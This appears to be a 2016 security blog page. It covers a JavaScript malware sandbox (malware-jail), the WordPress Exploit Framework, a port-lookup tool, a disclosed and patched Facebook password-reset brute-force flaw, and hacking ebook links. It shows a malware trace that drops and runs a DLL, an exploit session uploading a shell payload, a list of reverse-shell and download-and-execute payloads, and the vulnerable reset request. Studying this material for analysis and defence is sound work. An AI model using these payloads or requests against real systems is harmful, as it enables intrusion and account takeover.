SECURITY EDUCATION, PRIVACY GUIDANCE, THREAT AWARENESS, OPEN SOURCE TOOLS, RESEARCH NOTES, AND RESPONSIBLE TECHNOLOGY CONTENT


Thursday, March 10, 2016

Sandbox for semi-automatic Javascript malware analysis and payload extraction - Malware-Jail




Sandbox for semi-automatic JavaScript malware analysis and payload extraction, written for Node.js.
malware-jail is written for Node's 'vm' sandbox. It currently implements the WScript (Windows Scripting Host) context in env/wscript.js, at least the part frequently used by malware. The Internet browser context is partially implemented in env/browser.js.

Runs on any operating system; tested on Linux (Node v4.2.1).

Prerequisites

You'll need Node.js and npm.
malware-jail requires the minimist, xmlhttprequest and entities npm packages; you may install them with:


npm install

or


npm install minimist xmlhttprequest entities

Warning
Be careful when working with real malware. Malware that is aware of this sandbox may try to escape and harm your PC. It is recommended that you run it either from an unprivileged Linux account or from within a virtualized Windows machine. The Angler files in the malware folder are NOT disarmed.

Usage


bash@linux# node jailme.js -h
11 Jan 00:07:39 - Malware sandbox ver. 0.2
11 Jan 00:07:39 - ------------------------
11 Jan 00:07:39 - Usage: node jailme.js [[-e file1] [-e file2] .. ] [-o ofile] [-s odir] [--down=y] [malware1 [malware2] .. ]
11 Jan 00:07:39 - -e ifile ... js that simulates specific environment
11 Jan 00:07:39 - -o ofile ... name of the file where sandbox shall be dumped at the end
11 Jan 00:07:39 - -s odir ... output directory for generated files (malware payload)
11 Jan 00:07:39 - --down=y ... use http request to download malware components automatically
11 Jan 00:07:39 - malware ... js with the malware code
11 Jan 00:07:39 - If no arguments are specified the default values are taken from config.json

In the examples folder you may find a deactivated malware file. Run the analysis with:


node jailme.js malware/example.js

or just simply:


node jailme.js

Browser-based malware can be tested with:


node jailme.js malware/example_browser.js

malware/example.js is the default malware file configured in config.json.
After analysis the complete sandbox context is dumped to the file 'sandbox_dump_after.json'. There you may find:
  • _eval_calls - array of the arguments of all eval() calls. Useful if eval() is used for deobfuscation.
  • _wscript_saved_files - content of all files that the malware attempted to drop. The actual files are saved to the output/ directory too.
  • _wscript_urls - all URLs that the malware intended to GET or POST.
  • _wscript_objects - WScript or ActiveX objects created.
'sandbox_dump_after.json' uses JSONPath, implemented by JSON-js/cycle.js, to save duplicated or cyclic references to the same object.

Sample output


bash@linux# node jailme.js malware/example.js
11 Jan 00:06:24 - Malware sandbox ver. 0.2
11 Jan 00:06:24 - ------------------------
11 Jan 00:06:24 - Sandbox environment sequence: env/eval.js,env/wscript.js
11 Jan 00:06:24 - Malware files: malware/example.js
11 Jan 00:06:24 - Output file for sandbox dump: sandbox_dump_after.json
11 Jan 00:06:24 - Output directory for generated files: output/
11 Jan 00:06:24 - ==> Preparing Sandbox environment.
11 Jan 00:06:24 - => Executing: env/eval.js
11 Jan 00:06:24 - Preparing sandbox to intercept eval() calls.
11 Jan 00:06:24 - => Executing: env/wscript.js
11 Jan 00:06:24 - Preparing sandbox to emulate WScript environment.
11 Jan 00:06:24 - ==> Executing malware file(s).
11 Jan 00:06:24 - => Executing: malware/example.js
11 Jan 00:06:24 - ActiveXObject(WScript.Shell)
11 Jan 00:06:24 - Created: WScript.Shell[1]
11 Jan 00:06:24 - WScript.Shell[1].ExpandEnvironmentStrings(%TEMP%)
11 Jan 00:06:24 - ActiveXObject(MSXML2.XMLHTTP)
11 Jan 00:06:24 - Created: MSXML2.XMLHTTP[2]
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].open(POST,http://EXAMPLE.COM/redir.php,false)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].setRequestHeader(Content-Type, application/x-www-form-urlencoded)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].send(iTlOlnxhMXnM=0.588860877091065&jndj=IT0601)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Not sending data, if you want to interract with remote server, set --down=y
11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Calling onreadystatechange() with dummy data
11 Jan 00:06:24 - ActiveXObject(ADODB.Stream)
11 Jan 00:06:24 - Created: ADODB_Stream[3]
11 Jan 00:06:24 - ADODB_Stream[3].Open()
11 Jan 00:06:24 - ADODB_Stream[3].Write(str) - 10001 bytes
11 Jan 00:06:24 - ADODB_Stream[3].SaveToFile(%TEMP%\57020551.dll, 2)
11 Jan 00:06:24 - WScript.Shell[1].Exec(rundll32 %TEMP%\57020551.dll, DllRegisterServer)
11 Jan 00:06:24 - ADODB_Stream[3].Close()
11 Jan 00:08:42 - ==> Script execution finished, dumping sandbox environment to a file.
11 Jan 00:08:42 - Saving: output/_TEMP__49629482.dll
11 Jan 00:08:42 - Saving: output/_TEMP__38611354.pdf
11 Jan 00:08:42 - Generated file saved
11 Jan 00:08:42 - Generated file saved
11 Jan 00:08:42 - The sandbox context has been saved to: sandbox_dump_after.json


In the above example the payload has been extracted into output/_TEMP__49629482.dll and output/_TEMP__38611354.pdf.

Example: Analysing Angler EK

Download and extract Angler EK from the pcap file at ANGLER EK SENDS CRYPTOWALL into malware/angler_full.html.
Strip the non-Angler part and save it as malware/angler_stripped.html.
Remove the <script> tags and convert the required <div> tags into:


document._addElementById(id, content);

and save the result as malware/angler.js.
Run the analysis:


node jailme.js malware/angler.js

You can also capture the output to a file:


node jailme.js malware/angler.js > angler_log.txt




A Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems - Wordpress-Exploit-Framework




A Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems.


What do I need to run it?

Ensure that you have Ruby 2.2.x installed on your system, then install all required dependencies by opening a command prompt / terminal in the WPXF folder and running bundle install.
If bundler is not present on your system, you can install it by running gem install bundler.

How do I use it?

Open a command prompt / terminal in the directory you downloaded WordPress Exploit Framework to, and start it by running ruby wpxf.rb.
Once loaded, you'll be presented with the wpxf prompt; from here you can search for modules using the search command or load a module using the use command.
Loading a module into your environment lets you set options with the set command and view information about the module using info.
Below is an example of how one would load the symposium_shell_upload exploit module, set the module and payload options, and run the exploit against the target.


wpxf > use exploit/symposium_shell_upload

[+] Loaded module: #<Wpxf::Exploit::SymposiumShellUpload:0x3916f20>

wpxf [exploit/symposium_shell_upload] > set host wp-sandbox

[+] Set host => wp-sandbox

wpxf [exploit/symposium_shell_upload] > set target_uri /wordpress/

[+] Set target_uri => /wordpress/

wpxf [exploit/symposium_shell_upload] > set payload exec

[+] Loaded payload: #<Wpxf::Payloads::Exec:0x434d078>

wpxf [exploit/symposium_shell_upload] > set cmd echo "Hello, world!"

[+] Set cmd => echo "Hello, world!"

wpxf [exploit/symposium_shell_upload] > run

[-] Preparing payload...
[-] Uploading the payload...
[-] Executing the payload...
[+] Result: Hello, world!
[+] Execution finished successfully


For a full list of supported commands, take a look at the project's wiki page.

What is the difference between auxiliary and exploit modules?

Auxiliary modules do not allow you to run payloads on the target machine, but instead allow you to extract information from the target, escalate privileges or provide denial of service functionality.
Exploit modules require you to specify a payload which subsequently gets executed on the target machine, allowing you to run arbitrary code to extract information from the machine, establish a remote shell or anything else that you want to do within the context of the web server.

What payloads are available?
  • bind_php: uploads a script that will bind to a specific port and allow WPXF to establish a remote shell.
  • custom: uploads and executes a custom PHP script.
  • download_exec: downloads and runs a remote executable file.
  • exec: runs a shell command on the remote server and returns the output to the WPXF session.
  • reverse_tcp: uploads a script that will establish a reverse TCP shell.
All these payloads, with the exception of custom, delete themselves after they have been executed, to avoid leaving them on the target machine after use or in the event that they are used to establish a shell which fails.

How can I write my own modules and payloads?


Guides on writing modules and payloads can be found on the wiki, and full documentation of the API can be found at http://www.getwpxf.com/doc.




A Command To Search Port Names And numbers - Whatportis



It often happens that we need to find the default port number for a specific service, or what service is normally listening on a given port.


Usage

This tool allows you to find what port is associated with a service:


$ whatportis redis
+-------+------+----------+---------------------------------------+
| Name  | Port | Protocol | Description                           |
+-------+------+----------+---------------------------------------+
| redis | 6379 | tcp      | An advanced key-value cache and store |
+-------+------+----------+---------------------------------------+

Or, conversely, what service is associated with a port number:

$ whatportis 5432
+------------+------+----------+---------------------+
| Name       | Port | Protocol | Description         |
+------------+------+----------+---------------------+
| postgresql | 5432 | tcp      | PostgreSQL Database |
| postgresql | 5432 | udp      | PostgreSQL Database |
+------------+------+----------+---------------------+

You can also search a pattern without knowing the exact name by adding the --like option:

$ whatportis mysql --like
+----------------+-------+----------+-----------------------------------+
| Name           | Port  | Protocol | Description                       |
+----------------+-------+----------+-----------------------------------+
| mysql-cluster  | 1186  | tcp      | MySQL Cluster Manager             |
| mysql-cluster  | 1186  | udp      | MySQL Cluster Manager             |
| mysql-cm-agent | 1862  | tcp      | MySQL Cluster Manager Agent       |
| mysql-cm-agent | 1862  | udp      | MySQL Cluster Manager Agent       |
| mysql-im       | 2273  | tcp      | MySQL Instance Manager            |
| mysql-im       | 2273  | udp      | MySQL Instance Manager            |
| mysql          | 3306  | tcp      | MySQL                             |
| mysql          | 3306  | udp      | MySQL                             |
| mysql-proxy    | 6446  | tcp      | MySQL Proxy                       |
| mysql-proxy    | 6446  | udp      | MySQL Proxy                       |
| mysqlx         | 33060 | tcp      | MySQL Database Extended Interface |
+----------------+-------+----------+-----------------------------------+


Installation


$ pip install whatportis


JSON output


You can display the results as JSON using the --json option:


$ whatportis 5432 --json
[
  {
    "description": "PostgreSQL Database",
    "protocol": "tcp",
    "name": "postgresql",
    "port": "5432"
  },
  {
    "description": "PostgreSQL Database",
    "protocol": "udp",
    "name": "postgresql",
    "port": "5432"
  }
]


REST API


Whatportis can also be started as a RESTful API server:



$ whatportis --server localhost 8080
 * Running on http://localhost:8080/ (Press CTRL+C to quit)

$ curl http://localhost:8080/ports
"ports": [
  {
    "description": "Description",
    "name": "Service Name",
    "port": "Port Number",
    "protocol": "Transport Protocol"
  },
  ...
]

$ curl http://localhost:8080/ports/3306
{
  "ports": [
    [
      "mysql",
      "3306",
      "tcp",
      "MySQL"
    ],
    [
      "mysql",
      "3306",
      "udp",
      "MySQL"
    ]
  ]
}

$ curl http://localhost:8080/ports/mysql?like
{
  "ports": [
    [
      "mysql-cluster",
      "1186",
      "tcp",
      "MySQL Cluster Manager"
    ],
    [
      "mysql-cluster",
      "1186",
      "udp",
      "MySQL Cluster Manager"
    ],
    ...
}


Notes

  • "Why not use grep <port> /etc/services"? Simply because I want a portable command that displays the output in a nice format (a pretty table).
  • The tool uses the Iana.org website to get the official list of ports. A private script has been created to fetch the website regularly and update the ports.json file. For this reason, an update command will be created in a future version.




Monday, March 7, 2016

Facebook Password reset vulnerability allowed hackers to hijack any FB account



Hacking Facebook is one of the most searched queries on Google because a lot of Facebook accounts are valuable. So much so that security researchers spend their valuable time and resources hunting for vulnerabilities in Facebook in search of that elusive big break. One such ethical researcher, Anand Prakash, has hit a jackpot with hacking Facebook. He found a critical vulnerability in Facebook which could have allowed him to hack into any FB account without breaking a sweat.

The vulnerability Prakash found resides in the way Facebook's beta pages handle 'Forgot Password' requests. Normally, when you forget your password, Facebook gives you a 'Forgot Password' option to get back into your FB account; it sends a 6-digit code to your registered phone number or email address. After you enter this code in the window, you are able to access your FB account and reset your password.

Prakash decided to test Facebook's Forgot Password mechanism for weaknesses. He tried to brute-force the 6-digit code in the 'Forgot Password' window, but since Facebook has placed a limit of 12 attempts he was unsuccessful and was locked out after 12 attempts.

He then turned his attention to Facebook's beta pages, beta.facebook.com and mbasic.beta.facebook.com, and found that the rate limit was missing on the forgot-password endpoints of these two hosts. Once he found that there was no limitation, he could brute-force his way into any Facebook account without worrying about the limits.

Vulnerable request:


POST /recover/as/code/ HTTP/1.1
Host: beta.facebook.com

lsd=AVoywo13&n=XXXXX


Brute-forcing the "n" parameter successfully allowed Prakash to set a new password for any Facebook user.

Video of the Proof of Concept





Prakash reported the issue to Facebook's security team on 22nd Feb 2016. Facebook immediately acknowledged the severity of the vulnerability and issued a fix on 23rd Feb. It also awarded Prakash a bug bounty of $15,000, which is among the top bounties paid by the networking giant.




By OffensiveSec

Sunday, March 6, 2016

Directory with various materials for studying hacking




Note: I am not responsible for your actions with these hacking materials; the materials are the responsibility of the student.

Directory with various materials for studying hacking, reverse engineering, malware, PenTest tools, etc.

By OffensiveSec


Hacking Ebooks ++ VI



Best Hacking EBooks 2016. Many teenagers today want to become a "hacker", but in fact it is not an easy task, because hackers have multiple programming skills and a sharp mind that finds vulnerabilities in sites, software and other types of application. If you want to become a hacker you need to spend most of your time at your computer learning new technologies and reading hacking books that can help you become an ethical hacker. First read the hacking books carefully, then practise what you learn, not for hacking purposes but only for educational purposes.


Hacking Ebooks ++ V




Hacking Ebooks ++ IV




Hacking Ebooks ++ III



Established in 2015. Offensive Sec Blog has been sharing security research, hacking tools, threat intelligence, and offensive security content since 2015.
Copyright © OffSec Blog | Powered by OffensiveSec
Design by OffSec | Built for the security community